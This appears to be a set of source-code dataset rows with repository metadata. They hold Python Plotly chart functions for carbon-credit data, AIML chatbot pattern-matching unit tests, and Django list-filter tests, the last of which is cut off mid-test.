margin=dict(t=80, b=20, l=0, r=0))
return fig
def on_vs_off_vintage_retired(df_verra_retired, retires_info_dict):
df_verra_retired = df_verra_retired[df_verra_retired["Vintage"] != "missing"]
df_verra_grouped = df_verra_retired.groupby(
'Vintage')['Quantity'].sum().to_frame().reset_index()
dfs = []
for i in retires_info_dict.keys():
df = retires_info_dict[i]["Dataframe"]
df = df[df["Vintage"] != "missing"]
df = df.groupby(
'Vintage')['Quantity'].sum().to_frame().reset_index()
df['Type'] = f'{i} Retired VCUs'
dfs.append(df)
df_verra_grouped['Type'] = 'Off-Chain Retired VCUs'
df_other_and_bridges = pd.concat(
dfs + [df_verra_grouped]).reset_index()
fig = px.bar(df_other_and_bridges, x="Vintage",
y="Quantity", color="Type", title="", height=300)
fig.update_traces(marker_line_width=0)
fig.update_layout(height=360, paper_bgcolor=FIGURE_BG_COLOR, plot_bgcolor=FIGURE_BG_COLOR,
xaxis=dict(showgrid=False),
yaxis=dict(showgrid=False), font_color='white', hovermode='x unified',
hoverlabel=dict(font_color='white', font_size=8), font_size=8,
legend=dict(title="", orientation="h", yanchor="bottom",
y=1.02, xanchor="right", x=1
),
margin=dict(t=80, b=20, l=0, r=0))
return fig
def on_vs_off_map(df_verra, bridges_info_dict):
df_verra = df_verra[df_verra["Country"] != "missing"]
df_verra_grouped = df_verra.groupby(
'Country')['Quantity'].sum().to_frame().reset_index()
df_verra_grouped["Text_Bridges"] = ""
df_verra_grouped["Quantity_Bridges"] = 0
for i in bridges_info_dict.keys():
df = bridges_info_dict[i]["Dataframe"]
df = df[df["Country"] != "missing"]
df = df.groupby(
'Country')['Quantity'].sum().to_frame().reset_index()
df['Type'] = f'{i} Bridged VCUs'
df_verra_grouped = df_verra_grouped.merge(df, how='left', left_on="Country",
right_on='Country', suffixes=('', f"_{i}"))
df_verra_grouped[f'Quantity_{i}'] = df_verra_grouped[f'Quantity_{i}'].fillna(
0)
df_verra_grouped["Quantity_Bridges"] = df_verra_grouped["Quantity_Bridges"] + \
df_verra_grouped[f'Quantity_{i}']
df_verra_grouped["Text_Bridges"] = df_verra_grouped["Text_Bridges"] + \
f'{i} Bridged VCUs = ' + \
df_verra_grouped[f'Quantity_{i}'].map(
'{:,.0f}'.format).astype(str) + '<br>'
df_verra_grouped["Percentage"] = ((df_verra_grouped["Quantity_Bridges"] /
df_verra_grouped['Quantity'])*100).round(decimals=4)
df_verra_grouped['text'] = df_verra_grouped['Country'] + '<br>' + '<br>' + \
df_verra_grouped["Text_Bridges"] + \
'Total Tokenized VCUs = ' + df_verra_grouped['Quantity_Bridges'].map('{:,.0f}'.format).astype(str) + \
'<br>' +\
'Verra Issued Credits = ' + df_verra_grouped['Quantity'].map('{:,.0f}'.format).astype(str) + '<br>' +\
'Percentage = ' + \
df_verra_grouped['Percentage'].astype(str) + '%' + '<br>'
df_verra_grouped = df_verra_grouped[df_verra_grouped["Country"] != ""].reset_index(
drop=True)
country_index = defaultdict(str, {country: pycountry.countries.search_fuzzy(country)[
0].alpha_3 for country in df_verra_grouped.Country.astype(str).unique()
if country != 'nan'})
df_verra_grouped['Country Code'] = [country_index[country]
for country in df_verra_grouped['Country']]
cut_bins = [-np.inf, 0, 2, 5, 10, 100]
bin_labels = ["0", "(0-2]", "(2-5]", "(5-10]", "(10-100]"]
df_verra_grouped["Percentage Bins"] = pd.cut(
df_verra_grouped["Percentage"], bins=cut_bins, labels=bin_labels)
df_verra_grouped = df_verra_grouped.sort_values(by=["Percentage"])
fig = px.choropleth(df_verra_grouped, locations="Country Code",
color="Percentage Bins",
hover_name='Country',
custom_data=['text'],
color_discrete_sequence=px.colors.sequential.Plasma_r,
height=300)
fig.update_traces(hovertemplate="%{customdata}")
fig.update_layout(height=360, geo=dict(bgcolor='rgba(0,0,0,0)', lakecolor='#4E5D6C',
landcolor='darkgrey',
subunitcolor='grey'),
font_color='white', dragmode=False, paper_bgcolor=FIGURE_BG_COLOR, hovermode='x unified',
hoverlabel=dict(font_color='white', font_size=8), font_size=8,
margin=dict(t=20, b=20, l=0, r=0),
legend=dict(font=dict(size=8), tracegroupgap=0,
title=" Percentage <br> Tokenized Credits", y=0.5))
return fig
def on_vs_off_map_retired(df_verra_retired, retires_info_dict):
df_verra_retired = df_verra_retired[df_verra_retired["Country"] != "missing"]
df_verra_grouped = df_verra_retired.groupby(
'Country')['Quantity'].sum().to_frame().reset_index()
df_verra_grouped["Text_Retires"] = ""
df_verra_grouped["Quantity_Retires"] = 0
for i in retires_info_dict.keys():
df = retires_info_dict[i]["Dataframe"]
df = df[df["Country"] != "missing"]
df = df.groupby(
'Country')['Quantity'].sum().to_frame().reset_index()
df['Type'] = f'{i} Retired VCUs'
df_verra_grouped = df_verra_grouped.merge(df, how='left', left_on="Country",
right_on='Country', suffixes=('', f"_{i}"))
df_verra_grouped[f'Quantity_{i}'] = df_verra_grouped[f'Quantity_{i}'].fillna(
0)
df_verra_grouped["Quantity_Retires"] = df_verra_grouped["Quantity_Retires"] + \
df_verra_grouped[f'Quantity_{i}']
df_verra_grouped["Text_Retires"] = df_verra_grouped["Text_Retires"] + \
f'{i} Retired VCUs = ' + \
df_verra_grouped[f'Quantity_{i}'].map(
'{:,.0f}'.format).astype(str) + '<br>'
df_verra_grouped["Percentage"] = ((df_verra_grouped["Quantity_Retires"] /
(df_verra_grouped["Quantity_Retires"] +
df_verra_grouped['Quantity']))*100).round(decimals=4)
df_verra_grouped['text'] = df_verra_grouped['Country'] + '<br>' + '<br>' + \
df_verra_grouped["Text_Retires"] + \
'Total On-Chain Retired VCUs = ' + df_verra_grouped['Quantity_Retires'].map('{:,.0f}'.format).astype(str) + \
'<br>' +\
'Total Verra Retired Credits = ' + df_verra_grouped['Quantity'].map('{:,.0f}'.format).astype(str) + '<br>' +\
'Percentage = ' + \
df_verra_grouped['Percentage'].astype(str) + '%' + '<br>'
df_verra_grouped = df_verra_grouped[df_verra_grouped["Country"] != ""].reset_index(
drop=True)
country_index = defaultdict(str, {country: pycountry.countries.search_fuzzy(country)[
0].alpha_3 for country in df_verra_grouped.Country.astype(str).unique()
if country != 'nan'})
df_verra_grouped['Country Code'] = [country_index[country]
for country in df_verra_grouped['Country']]
cut_bins = [-np.inf, 0, 2, 5, 10, 100]
bin_labels = ["0", "(0-2]", "(2-5]", "(5-10]", "(10-100]"]
df_verra_grouped["Percentage Bins"] = pd.cut(
df_verra_grouped["Percentage"], bins=cut_bins, labels=bin_labels)
df_verra_grouped = df_verra_grouped.sort_values(by=["Percentage"])
fig = px.choropleth(df_verra_grouped, locations="Country Code",
color="Percentage Bins",
hover_name='Country',
custom_data=['text'],
color_discrete_sequence=px.colors.sequential.Plasma_r,
height=300)
fig.update_traces(hovertemplate="%{customdata}")
fig.update_layout(height=360, geo=dict(bgcolor='rgba(0,0,0,0)', lakecolor='#4E5D6C',
landcolor='darkgrey',
subunitcolor='grey'),
font_color='white', dragmode=False, paper_bgcolor=FIGURE_BG_COLOR, hovermode='x unified',
hoverlabel=dict(font_color='white', font_size=8), font_size=8,
margin=dict(t=20, b=20, l=0, r=0),
legend=dict(font=dict(size=8), tracegroupgap=0,
title=" Percentage On-Chain <br> Retired Credits", y=0.5))
return fig
def on_vs_off_project(df_verra, bridges_info_dict):
df_verra = df_verra[df_verra["Project Type"] != "missing"]
df_verra_grouped = df_verra.groupby(
'Project Type')['Quantity'].sum().to_frame().reset_index()
df_verra_other_grouped = pd.DataFrame()
dfs = []
colors = {}
for i in bridges_info_dict.keys():
df = bridges_info_dict[i]["Dataframe"]
df = df[df["Project Type"] != "missing"]
df = df.groupby(
'Project Type')['Quantity'].sum().to_frame().reset_index()
df['Type'] = f'{i} Bridged VCUs'
colors[f'{i} Bridged VCUs'] = '#00CC33'
dfs.append(df)
if df_verra_other_grouped.empty:
df_verra_other_grouped = df_verra_grouped.merge(df, how='left', left_on="Project Type",
right_on='Project Type', suffixes=('', f"_{i}"))
else:
df_verra_other_grouped = df_verra_other_grouped.merge(df, how='left', left_on="Project Type",
right_on='Project Type', suffixes=('', f"_{i}"))
df_verra_other_grouped[f'Quantity_{i}'] = df_verra_other_grouped[f'Quantity_{i}'].fillna(
0)
df_verra_other_grouped['Quantity'] = df_verra_other_grouped['Quantity'] - \
df_verra_other_grouped[f'Quantity_{i}']
df_verra_other_grouped = df_verra_other_grouped[[
'Project Type', 'Quantity']]
df_verra_other_grouped['Type'] = 'Rest of Issued VCUs'
colors['Rest of Issued VCUs'] = '#536C9C'
colors['(?)'] = '#6E6E6E'
df_other_and_bridges = pd.concat(
dfs + [df_verra_other_grouped]).reset_index()
fig = px.treemap(df_other_and_bridges, path=[px.Constant("All Projects"), 'Project Type', 'Type'],
values='Quantity',
color_discrete_map=colors,
# color_discrete_sequence=px.colors.qualitative.Antique,
color='Type',
hover_data=['Type', 'Quantity'],
height=480, title='')
fig.update_traces(textfont=dict(color='white'), textinfo="label+value+percent parent+percent entry+percent root",
texttemplate='<br>'.join(['%{label}', 'Quantity=%{value}', '%{percentParent} of Parent',
'%{percentEntry} of Entry', '%{percentRoot} of Root']))
fig.update_layout(paper_bgcolor=FIGURE_BG_COLOR, plot_bgcolor=FIGURE_BG_COLOR, font=dict(color='white'),
hoverlabel=dict(font_color='white', font_size=8), font_size=12,
margin=dict(t=20, b=20, l=0, r=0))
return fig
def on_vs_off_project_retired(df_verra_retired, retires_info_dict):
df_verra_retired = df_verra_retired[df_verra_retired["Project Type"] != "missing"]
df_verra_grouped = df_verra_retired.groupby(
'Project Type')['Quantity'].sum().to_frame().reset_index()
colors = {}
dfs = []
for i in retires_info_dict.keys():
df = retires_info_dict[i]["Dataframe"]
df = df[df["Project Type"] != "missing"]
df = df.groupby(
'Project Type')['Quantity'].sum().to_frame().reset_index()
df['Type'] = f'{i} Retired VCUs'
colors[f'{i} Retired VCUs'] = '#00CC33'
dfs.append(df)
df_verra_grouped['Type'] = 'Off-Chain Retired VCUs'
colors['Off-Chain Retired VCUs'] = '#536C9C'
colors['(?)'] = '#6E6E6E'
df_other_and_bridges = pd.concat(
dfs + [df_verra_grouped]).reset_index()
fig = px.treemap(df_other_and_bridges, path=[px.Constant("All Projects"), 'Project Type', 'Type'],
values='Quantity',
color_discrete_map=colors,
# color_discrete_sequence=px.colors.qualitative.Antique,
color='Type',
hover_data=['Type', 'Quantity'],
height=480, title='')
fig.update_traces(textfont=dict(color='white'), textinfo="label+value+percent parent+percent entry+percent root",
texttemplate='<br>'.join(['%{label}', 'Quantity=%{value}', '%{percentParent} of Parent',
'%{percentEntry} of Entry', '%{percentRoot} of Root']))
fig.update_layout(paper_bgcolor=FIGURE_BG_COLOR, plot_bgcolor=FIGURE_BG_COLOR, font=dict(color='white'),
hoverlabel=dict(font_color='white', font_size=8), font_size=12,
margin=dict(t=20, b=20, l=0, r=0))
return fig
| 51.350427
| 120
| 0.564723
| 4,969
| 42,056
| 4.52586
| 0.059368
| 0.062875
| 0.064743
| 0.048913
| 0.908622
| 0.895282
| 0.889946
| 0.873805
| 0.847748
| 0.829472
| 0
| 0.019496
| 0.29261
| 42,056
| 818
| 121
| 51.413203
| 0.736437
| 0.003662
| 0
| 0.745924
| 0
| 0
| 0.134568
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.03125
| false
| 0
| 0.013587
| 0
| 0.076087
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1cce22fc18f653d39af6242df7dccc3e6e1d951f
| 7,964
|
py
|
Python
|
test/programytest/aiml_tests/basics_tests/test_basic_aiml.py
|
motazsaad/fit-bot-fb-clt
|
580477aa1ec91855b621d9ae276f2705962f6a87
|
[
"MIT"
] | 5
|
2018-08-21T00:13:45.000Z
|
2018-09-01T20:00:55.000Z
|
test/programytest/aiml_tests/basics_tests/test_basic_aiml.py
|
motazsaad/fit-bot-fb-clt
|
580477aa1ec91855b621d9ae276f2705962f6a87
|
[
"MIT"
] | 1
|
2018-09-12T18:30:17.000Z
|
2018-09-12T18:30:17.000Z
|
test/programytest/aiml_tests/basics_tests/test_basic_aiml.py
|
motazsaad/fit-bot-fb-clt
|
580477aa1ec91855b621d9ae276f2705962f6a87
|
[
"MIT"
] | 5
|
2018-08-21T00:08:36.000Z
|
2018-09-23T06:11:04.000Z
|
import unittest
import os
from programytest.client import TestClient
class BasicTestClient(TestClient):
def __init__(self):
TestClient.__init__(self)
def load_storage(self):
super(BasicTestClient, self).load_storage()
self.add_default_stores()
self.add_categories_store([os.path.dirname(__file__)])
class BasicAIMLTests(unittest.TestCase):
def setUp(self):
client = BasicTestClient()
self._client_context = client.create_client_context("testid")
def test_basic_basic_text(self):
response = self._client_context.bot.ask_question(self._client_context, "NO RESPONSE")
self.assertEqual(response, '')
def test_basic_one_word(self):
response = self._client_context.bot.ask_question(self._client_context, "HELLO")
self.assertEqual(response, "HELLO, WORLD.")
def test_basic_two_words(self):
response = self._client_context.bot.ask_question(self._client_context, "HELLO THERE")
self.assertEqual(response, "HOW ARE YOU.")
def test_basic_three_words(self):
response = self._client_context.bot.ask_question(self._client_context, "HELLO THERE NOW")
self.assertEqual(response, "HOW ARE YOU NOW.")
def test_basic_no_match(self):
response = self._client_context.bot.ask_question(self._client_context, "HELLO YOU")
self.assertEqual(response, '')
def test_star_after_no_match(self):
response = self._client_context.bot.ask_question(self._client_context, "HI")
self.assertEqual(response, '')
def test_star_after_no_match_single(self):
response = self._client_context.bot.ask_question(self._client_context, "HI THERE")
self.assertEqual(response, "HI, HOW ARE YOU.")
def test_star_after_no_match_multiple(self):
response = self._client_context.bot.ask_question(self._client_context, "HI THERE MATE")
self.assertEqual(response, "HI, HOW ARE YOU.")
def test_star_before_no_match(self):
response = self._client_context.bot.ask_question(self._client_context, "HEY")
self.assertEqual(response, '')
def test_star_before_single(self):
response = self._client_context.bot.ask_question(self._client_context, "WELL HEY")
self.assertEqual(response, "HEY, HOW ARE YOU.")
def test_star_before_multiple(self):
response = self._client_context.bot.ask_question(self._client_context, "WELL NOW HEY")
self.assertEqual(response, "HEY, HOW ARE YOU.")
def test_star_before2(self):
response = self._client_context.bot.ask_question(self._client_context, "HELLO THERE HEY")
self.assertEqual(response, "HEY, HOW ARE YOU.")
def test_hash_after(self):
response = self._client_context.bot.ask_question(self._client_context, "HOWDY")
self.assertEqual(response, "HOWDY PARTNER.")
response = self._client_context.bot.ask_question(self._client_context, "HOWDY MATE")
self.assertEqual(response, "HOWDY PARTNER.")
response = self._client_context.bot.ask_question(self._client_context, "HOWDY THERE MATE")
self.assertEqual(response, "HOWDY PARTNER.")
def test_hash_before(self):
response = self._client_context.bot.ask_question(self._client_context, "YO")
self.assertEqual(response, "YO, HOW ARE YOU.")
response = self._client_context.bot.ask_question(self._client_context, "HEY YO")
self.assertEqual(response, "YO, HOW ARE YOU.")
response = self._client_context.bot.ask_question(self._client_context, "HEY NOW YO")
self.assertEqual(response, "YO, HOW ARE YOU.")
response = self._client_context.bot.ask_question(self._client_context, "HELLO THERE YO")
self.assertEqual(response, "YO, HOW ARE YOU.")
def test_star_star_no_match(self):
response = self._client_context.bot.ask_question(self._client_context, "GOODBYE")
self.assertEqual(response, '')
def test_star_star_still_no_match(self):
response = self._client_context.bot.ask_question(self._client_context, "GOODBYE MATE")
self.assertEqual(response, '')
def test_star_star_match(self):
response = self._client_context.bot.ask_question(self._client_context, "WELL GOODBYE MATE")
self.assertEqual(response, "BYE BYE.")
def test_star_hash_no_match(self):
response = self._client_context.bot.ask_question(self._client_context, "SEEYA")
self.assertEqual(response, '')
def test_star_hash_still_no_match(self):
response = self._client_context.bot.ask_question(self._client_context, "SEEYA MATE")
self.assertEqual(response, '')
def test_star_no_hash_match(self):
response = self._client_context.bot.ask_question(self._client_context, "WELL SEEYA")
self.assertEqual(response, "BYE THE NOW.")
def test_star_hash_match(self):
response = self._client_context.bot.ask_question(self._client_context, "WELL SEEYA MATE")
self.assertEqual(response, "BYE THE NOW.")
def test_hash_hash(self):
response = self._client_context.bot.ask_question(self._client_context, "LATER")
self.assertEqual(response, "LATERZ.")
response = self._client_context.bot.ask_question(self._client_context, "LATER MATE")
self.assertEqual(response, "LATERZ.")
response = self._client_context.bot.ask_question(self._client_context, "WELL LATER")
self.assertEqual(response, "LATERZ.")
response = self._client_context.bot.ask_question(self._client_context, "WELL LATER MATE")
self.assertEqual(response, "LATERZ.")
def test_hash_star_no_match(self):
response = self._client_context.bot.ask_question(self._client_context, "FAREWELL")
self.assertEqual(response, '')
def test_hash_star_hash_only(self):
response = self._client_context.bot.ask_question(self._client_context, "WELL FAREWELL")
self.assertEqual(response, '')
def test_hash_star_no_hash_and_star(self):
response = self._client_context.bot.ask_question(self._client_context, "WELL FAREWELL MATE")
self.assertEqual(response, "UNTIL TOMORROW.")
def test_hash_star_hash_and_star(self):
response = self._client_context.bot.ask_question(self._client_context, "FAREWELL MATE")
self.assertEqual(response, "UNTIL TOMORROW.")
def test_hash_middle(self):
response = self._client_context.bot.ask_question(self._client_context, "MORNING MATE")
self.assertEqual(response, 'GOOD MORNING.')
response = self._client_context.bot.ask_question(self._client_context, "MORNING THERE MATE")
self.assertEqual(response, 'GOOD MORNING.')
response = self._client_context.bot.ask_question(self._client_context, "MORNING MY GOOD MATE")
self.assertEqual(response, 'GOOD MORNING.')
def test_hash_middle_with_extra(self):
response = self._client_context.bot.ask_question(self._client_context, "MORNING MATE AHOY")
self.assertEqual(response, '')
response = self._client_context.bot.ask_question(self._client_context, "MORNING MY MATE AHOY")
self.assertEqual(response, '')
def test_star_middle_no_match(self):
response = self._client_context.bot.ask_question(self._client_context, "EVENING CHUM")
self.assertEqual(response, '')
def test_star_middle_still_no_match(self):
response = self._client_context.bot.ask_question(self._client_context, "EVENING THERE CHUM HALLO")
self.assertEqual(response, '')
def test_star_middle_match_single(self):
response = self._client_context.bot.ask_question(self._client_context, "EVENING THERE CHUM")
self.assertEqual(response, 'GOOD EVENING.')
def test_star_middle_match_multi(self):
response = self._client_context.bot.ask_question(self._client_context, "EVENING THERE MY CHUM")
self.assertEqual(response, 'GOOD EVENING.')
| 43.048649
| 106
| 0.716349
| 1,004
| 7,964
| 5.329681
| 0.087649
| 0.164455
| 0.276397
| 0.200897
| 0.88675
| 0.85498
| 0.790506
| 0.743786
| 0.708279
| 0.693328
| 0
| 0.000152
| 0.174284
| 7,964
| 184
| 107
| 43.282609
| 0.813564
| 0
| 0
| 0.295455
| 0
| 0
| 0.11252
| 0
| 0
| 0
| 0
| 0
| 0.325758
| 1
| 0.265152
| false
| 0
| 0.022727
| 0
| 0.30303
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
1ce4073f3792db70c50b0d120861ef8ac9b590a2
| 18,789
|
py
|
Python
|
cradmin_legacy/tests/viewhelpers/test_listfilter/django/single/test_select.py
|
appressoas/cradmin_legacy
|
b9d024299333dd04c87c1031bd5be5778aa7f1f1
|
[
"BSD-3-Clause"
] | null | null | null |
cradmin_legacy/tests/viewhelpers/test_listfilter/django/single/test_select.py
|
appressoas/cradmin_legacy
|
b9d024299333dd04c87c1031bd5be5778aa7f1f1
|
[
"BSD-3-Clause"
] | 17
|
2018-03-07T15:52:42.000Z
|
2022-03-12T01:07:06.000Z
|
cradmin_legacy/tests/viewhelpers/test_listfilter/django/single/test_select.py
|
appressoas/cradmin_legacy
|
b9d024299333dd04c87c1031bd5be5778aa7f1f1
|
[
"BSD-3-Clause"
] | 1
|
2018-07-23T22:13:45.000Z
|
2018-07-23T22:13:45.000Z
|
from __future__ import unicode_literals
from cradmin_legacy.python2_compatibility import mock
from django.test import TestCase
from future import standard_library
from model_bakery import baker
from cradmin_legacy import datetimeutils
from cradmin_legacy.tests.viewhelpers.cradmin_viewhelpers_testapp.models import FilterTestModel
from cradmin_legacy.viewhelpers import listfilter
standard_library.install_aliases()
class TestBoolean(TestCase):
def test_no_value(self):
testfilter = listfilter.django.single.select.Boolean(slug='mycharfield')
testfilter.set_values(values=[])
withvalue = baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
mycharfield='A testvalue')
emptyvalue = baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
mycharfield='')
nullvalue = baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
mycharfield=None)
self.assertEqual(
{withvalue, emptyvalue, nullvalue},
set(testfilter.filter(queryobject=FilterTestModel.objects.all())))
def test_invalid_value(self):
testfilter = listfilter.django.single.select.Boolean(slug='mycharfield')
testfilter.set_values(values=['invalidstuff'])
withvalue = baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
mycharfield='A testvalue')
emptyvalue = baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
mycharfield='')
nullvalue = baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
mycharfield=None)
self.assertEqual(
{withvalue, emptyvalue, nullvalue},
set(testfilter.filter(queryobject=FilterTestModel.objects.all())))
def test_false_booleanfield(self):
testfilter = listfilter.django.single.select.Boolean(slug='mybooleanfield')
testfilter.set_values(values=['false'])
baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
mybooleanfield=True)
falsevalue = baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
mybooleanfield=False)
self.assertEqual(
{falsevalue},
set(testfilter.filter(queryobject=FilterTestModel.objects.all())))
def test_true_booleanfield(self):
testfilter = listfilter.django.single.select.Boolean(slug='mybooleanfield')
testfilter.set_values(values=['true'])
truevalue = baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
mybooleanfield=True)
baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
mybooleanfield=False)
self.assertEqual(
{truevalue},
set(testfilter.filter(queryobject=FilterTestModel.objects.all())))
class TestIsNotNull(TestCase):
def test_false(self):
testfilter = listfilter.django.single.select.IsNotNull(slug='myintnullfield')
testfilter.set_values(values=['false'])
baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
myintnullfield=10)
nullvalue = baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
myintnullfield=None)
self.assertEqual(
{nullvalue},
set(testfilter.filter(queryobject=FilterTestModel.objects.all())))
def test_true(self):
testfilter = listfilter.django.single.select.IsNotNull(slug='myintnullfield')
testfilter.set_values(values=['true'])
withvalue = baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
myintnullfield=10)
baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
myintnullfield=None)
self.assertEqual(
{withvalue},
set(testfilter.filter(queryobject=FilterTestModel.objects.all())))
def test_true_zero(self):
testfilter = listfilter.django.single.select.IsNotNull(slug='myintnullfield')
testfilter.set_values(values=['true'])
withvalue = baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
myintnullfield=0)
baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
myintnullfield=None)
self.assertEqual(
{withvalue},
set(testfilter.filter(queryobject=FilterTestModel.objects.all())))
class TestDateTime(TestCase):
def test_no_value(self):
testfilter = listfilter.django.single.select.DateTime(slug='mydatetimefield')
testfilter.set_values(values=[])
testitem = baker.make('cradmin_viewhelpers_testapp.FilterTestModel')
self.assertEqual(
{testitem},
set(testfilter.filter(queryobject=FilterTestModel.objects.all())))
def test_invalid_value(self):
testfilter = listfilter.django.single.select.DateTime(slug='mydatetimefield')
testfilter.set_values(values=['invalidstuff'])
testitem = baker.make('cradmin_viewhelpers_testapp.FilterTestModel')
self.assertEqual(
{testitem},
set(testfilter.filter(queryobject=FilterTestModel.objects.all())))
def test_today_nomatch(self):
testfilter = listfilter.django.single.select.DateTime(slug='mydatetimefield')
testfilter.set_values(values=['today'])
baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
mydatetimefield=datetimeutils.default_timezone_datetime(2015, 1, 1))
with mock.patch('cradmin_legacy.viewhelpers.listfilter.basefilters.single.abstractselect.timezone.now',
lambda: datetimeutils.default_timezone_datetime(2015, 1, 2)):
self.assertFalse(
testfilter.filter(queryobject=FilterTestModel.objects.all()).exists())
def test_today_match(self):
testfilter = listfilter.django.single.select.DateTime(slug='mydatetimefield')
testfilter.set_values(values=['today'])
testitem = baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
mydatetimefield=datetimeutils.default_timezone_datetime(2015, 1, 1))
with mock.patch('cradmin_legacy.viewhelpers.listfilter.basefilters.single.abstractselect.timezone.now',
lambda: datetimeutils.default_timezone_datetime(2015, 1, 1, 12, 30)):
self.assertEqual(
{testitem},
set(testfilter.filter(queryobject=FilterTestModel.objects.all())))
def test_yesterday_nomatch(self):
testfilter = listfilter.django.single.select.DateTime(slug='mydatetimefield')
testfilter.set_values(values=['yesterday'])
baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
mydatetimefield=datetimeutils.default_timezone_datetime(2015, 1, 10))
with mock.patch('cradmin_legacy.viewhelpers.listfilter.basefilters.single.abstractselect.timezone.now',
lambda: datetimeutils.default_timezone_datetime(2015, 1, 12)):
self.assertFalse(
testfilter.filter(queryobject=FilterTestModel.objects.all()).exists())
def test_yesterday_match(self):
testfilter = listfilter.django.single.select.DateTime(slug='mydatetimefield')
testfilter.set_values(values=['yesterday'])
testitem = baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
mydatetimefield=datetimeutils.default_timezone_datetime(2015, 1, 10))
with mock.patch('cradmin_legacy.viewhelpers.listfilter.basefilters.single.abstractselect.timezone.now',
lambda: datetimeutils.default_timezone_datetime(2015, 1, 11, 12, 30)):
self.assertEqual(
{testitem},
set(testfilter.filter(queryobject=FilterTestModel.objects.all())))
def test_last_seven_days_nomatch(self):
testfilter = listfilter.django.single.select.DateTime(slug='mydatetimefield')
testfilter.set_values(values=['last_seven_days'])
baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
mydatetimefield=datetimeutils.default_timezone_datetime(2015, 1, 2))
with mock.patch('cradmin_legacy.viewhelpers.listfilter.basefilters.single.abstractselect.timezone.now',
lambda: datetimeutils.default_timezone_datetime(2015, 1, 10, 12, 30)):
self.assertFalse(
testfilter.filter(queryobject=FilterTestModel.objects.all()).exists())
def test_last_seven_days_match(self):
testfilter = listfilter.django.single.select.DateTime(slug='mydatetimefield')
testfilter.set_values(values=['last_seven_days'])
testitem = baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
mydatetimefield=datetimeutils.default_timezone_datetime(2015, 1, 3))
with mock.patch('cradmin_legacy.viewhelpers.listfilter.basefilters.single.abstractselect.timezone.now',
lambda: datetimeutils.default_timezone_datetime(2015, 1, 10, 12, 30)):
self.assertEqual(
{testitem},
set(testfilter.filter(queryobject=FilterTestModel.objects.all())))
def test_this_week_nomatch(self):
testfilter = listfilter.django.single.select.DateTime(slug='mydatetimefield')
testfilter.set_values(values=['this_week'])
baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
mydatetimefield=datetimeutils.default_timezone_datetime(2015, 11, 29))
baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
mydatetimefield=datetimeutils.default_timezone_datetime(2015, 12, 7))
with mock.patch('cradmin_legacy.viewhelpers.listfilter.basefilters.single.abstractselect.timezone.now',
lambda: datetimeutils.default_timezone_datetime(2015, 12, 1, 12, 30)):
self.assertFalse(
testfilter.filter(queryobject=FilterTestModel.objects.all()).exists())
def test_this_week_match(self):
testfilter = listfilter.django.single.select.DateTime(slug='mydatetimefield')
testfilter.set_values(values=['this_week'])
start_of_week = baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
mydatetimefield=datetimeutils.default_timezone_datetime(2015, 11, 30))
end_of_week = baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
mydatetimefield=datetimeutils.default_timezone_datetime(2015, 12, 6, 23))
with mock.patch('cradmin_legacy.viewhelpers.listfilter.basefilters.single.abstractselect.timezone.now',
lambda: datetimeutils.default_timezone_datetime(2015, 12, 1, 12, 30)):
self.assertEqual(
{start_of_week, end_of_week},
set(testfilter.filter(queryobject=FilterTestModel.objects.all())))
def test_this_month_nomatch(self):
testfilter = listfilter.django.single.select.DateTime(slug='mydatetimefield')
testfilter.set_values(values=['this_month'])
baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
mydatetimefield=datetimeutils.default_timezone_datetime(2015, 11, 29))
baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
mydatetimefield=datetimeutils.default_timezone_datetime(2016, 1, 1))
with mock.patch('cradmin_legacy.viewhelpers.listfilter.basefilters.single.abstractselect.timezone.now',
lambda: datetimeutils.default_timezone_datetime(2015, 12, 7, 12, 30)):
self.assertFalse(
testfilter.filter(queryobject=FilterTestModel.objects.all()).exists())
def test_this_month_match(self):
testfilter = listfilter.django.single.select.DateTime(slug='mydatetimefield')
testfilter.set_values(values=['this_month'])
start_of_month = baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
mydatetimefield=datetimeutils.default_timezone_datetime(2015, 12, 1))
middle_of_month = baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
mydatetimefield=datetimeutils.default_timezone_datetime(2015, 12, 24))
end_of_month = baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
mydatetimefield=datetimeutils.default_timezone_datetime(2015, 12, 31, 23))
with mock.patch('cradmin_legacy.viewhelpers.listfilter.basefilters.single.abstractselect.timezone.now',
lambda: datetimeutils.default_timezone_datetime(2015, 12, 7, 12, 30)):
self.assertEqual(
